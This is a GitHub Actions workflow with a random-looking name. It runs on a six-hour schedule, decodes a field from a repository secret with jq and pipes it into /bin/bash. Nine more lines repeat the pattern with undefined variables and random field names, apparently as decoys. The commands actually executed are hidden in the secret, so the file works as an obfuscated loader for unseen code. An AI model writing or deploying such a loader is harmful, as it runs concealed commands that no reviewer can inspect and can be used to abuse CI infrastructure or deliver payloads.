name: baixiaochi1974

on:
  workflow_dispatch:
  schedule:
    - cron: '35 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: baixiaochi1974
        env:
          s0: ${{ secrets.s0 }}
        run: |
          echo $s0 | jq -r .j635 | /bin/bash
          echo $ogr30 | jq -r .psjj3 | /bin/bash
          echo $vdfh30753 | jq -r .qylck49441 | /bin/bash
          echo $rfpau1 | jq -r .odhxt031 | /bin/bash
          echo $j826 | jq -r .bxob3 | /bin/bash
          echo $byv53 | jq -r .uzrb28748 | /bin/bash
          echo $ht96 | jq -r .vr38027 | /bin/bash
          echo $jg3 | jq -r .ln2 | /bin/bash
          echo $k5978 | jq -r .jm015 | /bin/bash
          echo $ndox6023 | jq -r .fufkm56 | /bin/bash

